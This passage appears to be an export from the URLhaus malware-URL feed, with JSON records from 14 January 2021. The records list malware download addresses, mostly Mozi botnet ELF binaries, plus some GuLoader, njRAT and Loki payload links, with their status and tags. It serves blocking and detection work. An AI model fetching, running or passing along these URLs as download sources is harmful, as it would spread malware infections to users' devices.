listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961000","urlhaus_reference":"https://urlhaus.abuse.ch/url/961000/","url":"http://27.204.253.74:43924/Mozi.m","url_status":"online","host":"27.204.253.74","date_added":"2021-01-14 16:21:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961001","urlhaus_reference":"https://urlhaus.abuse.ch/url/961001/","url":"http://117.247.202.55:38851/i","url_status":"offline","host":"117.247.202.55","date_added":"2021-01-14 16:21:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960996","urlhaus_reference":"https://urlhaus.abuse.ch/url/960996/","url":"http://125.44.13.139:33008/Mozi.m","url_status":"offline","host":"125.44.13.139","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960997","urlhaus_reference":"https://urlhaus.abuse.ch/url/960997/","url":"http://125.46.165.217:60201/Mozi.m","url_status":"online","host":"125.46.165.217","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960998","urlhaus_reference":"https://urlhaus.abuse.ch/url/960998/","url":"http://182.119.116.38:41479/Mozi.m","url_status":"online","host":"182.119.116.38","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960999","urlhaus_reference":"https://urlhaus.abuse.ch/url/960999/","url":"http://42.228.41.177:52003/Mozi.m","url_status":"online","host":"42.228.41.177","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960995","urlhaus_reference":"https://urlhaus.abuse.ch/url/960995/","url":"http://117.222.170.18:39500/Mozi.m","url_status":"offline","host":"117.222.170.18","date_added":"2021-01-14 16:20:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960994","urlhaus_reference":"https://urlhaus.abuse.ch/url/960994/","url":"http://115.58.165.141:36966/Mozi.m","url_status":"online","host":"115.58.165.141","date_added":"2021-01-14 16:20:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960991","urlhaus_reference":"https://urlhaus.abuse.ch/url/960991/","url":"http://117.247.206.204:59875/Mozi.m","url_status":"offline","host":"117.247.206.204","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960992","urlhaus_reference":"https://urlhaus.abuse.ch/url/960992/","url":"http://117.222.171.220:44123/Mozi.m","url_status":"offline","host":"117.222.171.220","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960993","urlhaus_reference":"https://urlhaus.abuse.ch/url/960993/","url":"http://117.194.163.151:45224/Mozi.a","url_status":"offline","host":"117.194.163.151","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960990","urlhaus_reference":"https://urlhaus.abuse.ch/url/960990/","url":"http://115.63.143.46:43105/Mozi.m","url_status":"online","host":"115.63.143.46","date_added":"2021-01-14 16:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960984","urlhaus_reference":"https://urlhaus.abuse.ch/url/960984/","url":"http://120.85.208.36:46011/Mozi.m","url_status":"online","host":"120.85.208.36","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960985","urlhaus_reference":"https://urlhaus.abuse.ch/url/960985/","url":"http://115.58.48.66:51170/Mozi.m","url_status":"online","host":"115.58.48.66","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960986","urlhaus_reference":"https://urlhaus.abuse.ch/url/960986/","url":"http://115.50.229.51:38025/Mozi.a","url_status":"online","host":"115.50.229.51","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960987","urlhaus_reference":"https://urlhaus.abuse.ch/url/960987/","url":"http://115.55.213.63:54132/Mozi.m","url_status":"online","host":"115.55.213.63","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960988","urlhaus_reference":"https://urlhaus.abuse.ch/url/960988/","url":"http://125.43.210.102:57705/Mozi.m","url_status":"online","host":"125.43.210.102","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960989","urlhaus_reference":"https://urlhaus.abuse.ch/url/960989/","url":"http://123.14.38.9:32983/Mozi.m","url_status":"online","host":"123.14.38.9","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960983","urlhaus_reference":"https://urlhaus.abuse.ch/url/960983/","url":"http://113.254.197.92:47908/Mozi.m","url_status":"offline","host":"113.254.197.92","date_added":"2021-01-14 16:19:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960982","urlhaus_reference":"https://urlhaus.abuse.ch/url/960982/","url":"http://113.89.245.89:35116/Mozi.m","url_status":"offline","host":"113.89.245.89","date_added":"2021-01-14 16:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960978","urlhaus_reference":"https://urlhaus.abuse.ch/url/960978/","url":"http://115.50.159.25:38070/Mozi.m","url_status":"online","host":"115.50.159.25","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960979","urlhaus_reference":"https://urlhaus.abuse.ch/url/960979/","url":"http://112.252.130.226:53399/Mozi.m","url_status":"online","host":"112.252.130.226","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960980","urlhaus_reference":"https://urlhaus.abuse.ch/url/960980/","url":"http://112.30.4.60:39529/Mozi.m","url_status":"online","host":"112.30.4.60","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960981","urlhaus_reference":"https://urlhaus.abuse.ch/url/960981/","url":"http://112.234.156.209:33465/Mozi.m","url_status":"offline","host":"112.234.156.209","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960977","urlhaus_reference":"https://urlhaus.abuse.ch/url/960977/","url":"http://59.99.44.18:59085/Mozi.m","url_status":"offline","host":"59.99.44.18","date_added":"2021-01-14 16:16:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"07ac0n","larted":"true","tags":["elf","Mozi"]} +{"id":"960976","urlhaus_reference":"https://urlhaus.abuse.ch/url/960976/","url":"http://59.58.148.90:33799/i","url_status":"online","host":"59.58.148.90","date_added":"2021-01-14 16:09:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960972","urlhaus_reference":"https://urlhaus.abuse.ch/url/960972/","url":"http://59.99.142.249:40430/Mozi.m","url_status":"offline","host":"59.99.142.249","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960973","urlhaus_reference":"https://urlhaus.abuse.ch/url/960973/","url":"http://59.99.47.139:43006/Mozi.m","url_status":"offline","host":"59.99.47.139","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960974","urlhaus_reference":"https://urlhaus.abuse.ch/url/960974/","url":"http://61.157.50.58:33385/Mozi.m","url_status":"online","host":"61.157.50.58","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960975","urlhaus_reference":"https://urlhaus.abuse.ch/url/960975/","url":"http://59.99.137.157:56649/Mozi.m","url_status":"offline","host":"59.99.137.157","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960971","urlhaus_reference":"https://urlhaus.abuse.ch/url/960971/","url":"http://59.99.137.202:55457/Mozi.m","url_status":"offline","host":"59.99.137.202","date_added":"2021-01-14 16:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960968","urlhaus_reference":"https://urlhaus.abuse.ch/url/960968/","url":"http://59.93.16.213:52314/Mozi.m","url_status":"offline","host":"59.93.16.213","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960969","urlhaus_reference":"https://urlhaus.abuse.ch/url/960969/","url":"http://42.230.56.231:41985/Mozi.m","url_status":"online","host":"42.230.56.231","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960970","urlhaus_reference":"https://urlhaus.abuse.ch/url/960970/","url":"http://125.41.97.157:53197/i","url_status":"online","host":"125.41.97.157","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960967","urlhaus_reference":"https://urlhaus.abuse.ch/url/960967/","url":"http://125.43.61.168:54472/Mozi.m","url_status":"online","host":"125.43.61.168","date_added":"2021-01-14 16:06:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960966","urlhaus_reference":"https://urlhaus.abuse.ch/url/960966/","url":"http://219.154.101.44:38100/Mozi.m","url_status":"offline","host":"219.154.101.44","date_added":"2021-01-14 16:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960964","urlhaus_reference":"https://urlhaus.abuse.ch/url/960964/","url":"http://189.51.126.160:33121/Mozi.m","url_status":"offline","host":"189.51.126.160","date_added":"2021-01-14 16:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960965","urlhaus_reference":"https://urlhaus.abuse.ch/url/960965/","url":"http://14.154.28.65:39363/Mozi.m","url_status":"online","host":"14.154.28.65","date_added":"2021-01-14 16:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960961","urlhaus_reference":"https://urlhaus.abuse.ch/url/960961/","url":"http://182.119.18.6:42844/Mozi.m","url_status":"online","host":"182.119.18.6","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960962","urlhaus_reference":"https://urlhaus.abuse.ch/url/960962/","url":"http://219.156.209.2:45789/Mozi.a","url_status":"online","host":"219.156.209.2","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960963","urlhaus_reference":"https://urlhaus.abuse.ch/url/960963/","url":"http://221.15.193.168:34080/Mozi.m","url_status":"online","host":"221.15.193.168","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960960","urlhaus_reference":"https://urlhaus.abuse.ch/url/960960/","url":"http://117.194.161.162:56067/Mozi.m","url_status":"offline","host":"117.194.161.162","date_added":"2021-01-14 16:05:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960959","urlhaus_reference":"https://urlhaus.abuse.ch/url/960959/","url":"http://117.215.208.204:34205/Mozi.m","url_status":"offline","host":"117.215.208.204","date_added":"2021-01-14 16:05:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960957","urlhaus_reference":"https://urlhaus.abuse.ch/url/960957/","url":"http://117.222.162.116:53239/Mozi.m","url_status":"offline","host":"117.222.162.116","date_added":"2021-01-14 16:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960958","urlhaus_reference":"https://urlhaus.abuse.ch/url/960958/","url":"http://117.215.209.95:53868/Mozi.m","url_status":"offline","host":"117.215.209.95","date_added":"2021-01-14 16:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960955","urlhaus_reference":"https://urlhaus.abuse.ch/url/960955/","url":"http://116.75.192.72:39724/Mozi.m","url_status":"offline","host":"116.75.192.72","date_added":"2021-01-14 16:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960956","urlhaus_reference":"https://urlhaus.abuse.ch/url/960956/","url":"http://117.213.43.181:60804/Mozi.m","url_status":"offline","host":"117.213.43.181","date_added":"2021-01-14 16:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960953","urlhaus_reference":"https://urlhaus.abuse.ch/url/960953/","url":"http://123.5.149.145:51949/Mozi.m","url_status":"online","host":"123.5.149.145","date_added":"2021-01-14 16:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960954","urlhaus_reference":"https://urlhaus.abuse.ch/url/960954/","url":"http://125.41.114.210:48224/Mozi.m","url_status":"online","host":"125.41.114.210","date_added":"2021-01-14 16:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960952","urlhaus_reference":"https://urlhaus.abuse.ch/url/960952/","url":"http://113.201.171.61:37716/Mozi.m","url_status":"online","host":"113.201.171.61","date_added":"2021-01-14 16:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960951","urlhaus_reference":"https://urlhaus.abuse.ch/url/960951/","url":"http://101.108.135.252:60524/Mozi.m","url_status":"offline","host":"101.108.135.252","date_added":"2021-01-14 16:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960946","urlhaus_reference":"https://urlhaus.abuse.ch/url/960946/","url":"http://urlfrance.fr/code/dd.txt","url_status":"offline","host":"urlfrance.fr","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["Encoded","njRAT","rat"]} +{"id":"960947","urlhaus_reference":"https://urlhaus.abuse.ch/url/960947/","url":"http://136.34.57.224:49988/bin.sh","url_status":"online","host":"136.34.57.224","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960948","urlhaus_reference":"https://urlhaus.abuse.ch/url/960948/","url":"http://115.50.64.136:42857/Mozi.m","url_status":"online","host":"115.50.64.136","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960949","urlhaus_reference":"https://urlhaus.abuse.ch/url/960949/","url":"http://200.52.228.27:44751/bin.sh","url_status":"offline","host":"200.52.228.27","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960950","urlhaus_reference":"https://urlhaus.abuse.ch/url/960950/","url":"http://115.63.203.134:47719/Mozi.m","url_status":"online","host":"115.63.203.134","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960945","urlhaus_reference":"https://urlhaus.abuse.ch/url/960945/","url":"http://181.194.120.182:38133/Mozi.m","url_status":"offline","host":"181.194.120.182","date_added":"2021-01-14 15:59:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"07ac0n","larted":"true","tags":["elf","Mozi"]} +{"id":"960944","urlhaus_reference":"https://urlhaus.abuse.ch/url/960944/","url":"http://www.sowetoson.com/new/Host_yjwloaz52.bin","url_status":"online","host":"www.sowetoson.com","date_added":"2021-01-14 15:57:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} +{"id":"960942","urlhaus_reference":"https://urlhaus.abuse.ch/url/960942/","url":"https://www.agamagroup.com.ng/zxc/janomo_uGdNtpvRY170.bin","url_status":"online","host":"www.agamagroup.com.ng","date_added":"2021-01-14 15:57:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} +{"id":"960943","urlhaus_reference":"https://urlhaus.abuse.ch/url/960943/","url":"https://onedrive.live.com/download?cid=8FE9EB3F9398B325&resid=8FE9EB3F9398B325%21126&authkey=AOzL9FiDhEYRkm8","url_status":"online","host":"onedrive.live.com","date_added":"2021-01-14 15:57:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} +{"id":"960941","urlhaus_reference":"https://urlhaus.abuse.ch/url/960941/","url":"http://59.93.22.84:46462/Mozi.m","url_status":"offline","host":"59.93.22.84","date_added":"2021-01-14 15:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960940","urlhaus_reference":"https://urlhaus.abuse.ch/url/960940/","url":"http://59.95.173.7:39046/Mozi.m","url_status":"offline","host":"59.95.173.7","date_added":"2021-01-14 15:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960934","urlhaus_reference":"https://urlhaus.abuse.ch/url/960934/","url":"http://42.224.66.103:47418/Mozi.m","url_status":"online","host":"42.224.66.103","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960935","urlhaus_reference":"https://urlhaus.abuse.ch/url/960935/","url":"http://42.228.37.137:42287/Mozi.m","url_status":"online","host":"42.228.37.137","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960936","urlhaus_reference":"https://urlhaus.abuse.ch/url/960936/","url":"http://59.99.41.229:49596/Mozi.m","url_status":"offline","host":"59.99.41.229","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960937","urlhaus_reference":"https://urlhaus.abuse.ch/url/960937/","url":"http://42.229.232.193:39815/Mozi.m","url_status":"online","host":"42.229.232.193","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960938","urlhaus_reference":"https://urlhaus.abuse.ch/url/960938/","url":"http://61.53.104.80:36568/Mozi.m","url_status":"online","host":"61.53.104.80","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960939","urlhaus_reference":"https://urlhaus.abuse.ch/url/960939/","url":"http://222.141.45.45:32954/Mozi.m","url_status":"online","host":"222.141.45.45","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960933","urlhaus_reference":"https://urlhaus.abuse.ch/url/960933/","url":"http://211.195.3.122:57752/Mozi.m","url_status":"online","host":"211.195.3.122","date_added":"2021-01-14 15:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960932","urlhaus_reference":"https://urlhaus.abuse.ch/url/960932/","url":"http://186.33.123.115:52221/Mozi.m","url_status":"online","host":"186.33.123.115","date_added":"2021-01-14 15:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960931","urlhaus_reference":"https://urlhaus.abuse.ch/url/960931/","url":"http://125.44.251.66:58493/Mozi.m","url_status":"online","host":"125.44.251.66","date_added":"2021-01-14 15:50:40 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960930","urlhaus_reference":"https://urlhaus.abuse.ch/url/960930/","url":"http://117.222.174.88:57603/Mozi.m","url_status":"offline","host":"117.222.174.88","date_added":"2021-01-14 15:50:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960929","urlhaus_reference":"https://urlhaus.abuse.ch/url/960929/","url":"http://117.202.70.238:45439/Mozi.m","url_status":"offline","host":"117.202.70.238","date_added":"2021-01-14 15:50:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960928","urlhaus_reference":"https://urlhaus.abuse.ch/url/960928/","url":"http://117.222.163.220:58291/Mozi.m","url_status":"offline","host":"117.222.163.220","date_added":"2021-01-14 15:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960927","urlhaus_reference":"https://urlhaus.abuse.ch/url/960927/","url":"http://117.251.18.157:52785/Mozi.m","url_status":"online","host":"117.251.18.157","date_added":"2021-01-14 15:50:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960924","urlhaus_reference":"https://urlhaus.abuse.ch/url/960924/","url":"http://123.9.198.150:38582/Mozi.m","url_status":"online","host":"123.9.198.150","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960925","urlhaus_reference":"https://urlhaus.abuse.ch/url/960925/","url":"http://125.46.164.249:39503/Mozi.m","url_status":"online","host":"125.46.164.249","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960926","urlhaus_reference":"https://urlhaus.abuse.ch/url/960926/","url":"http://123.14.32.234:53018/Mozi.m","url_status":"online","host":"123.14.32.234","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960923","urlhaus_reference":"https://urlhaus.abuse.ch/url/960923/","url":"http://123.5.7.214:40698/Mozi.m","url_status":"online","host":"123.5.7.214","date_added":"2021-01-14 15:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960922","urlhaus_reference":"https://urlhaus.abuse.ch/url/960922/","url":"http://116.24.57.201:50060/Mozi.m","url_status":"online","host":"116.24.57.201","date_added":"2021-01-14 15:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960921","urlhaus_reference":"https://urlhaus.abuse.ch/url/960921/","url":"http://115.48.21.16:47874/Mozi.m","url_status":"online","host":"115.48.21.16","date_added":"2021-01-14 15:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960919","urlhaus_reference":"https://urlhaus.abuse.ch/url/960919/","url":"http://perezluzwsdycafeyzmn.dns.navy/perdoc/regasm.exe","url_status":"online","host":"perezluzwsdycafeyzmn.dns.navy","date_added":"2021-01-14 15:46:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"listed"},"reporter":"abuse_ch","larted":"true","tags":["exe","Loki","opendir"]} 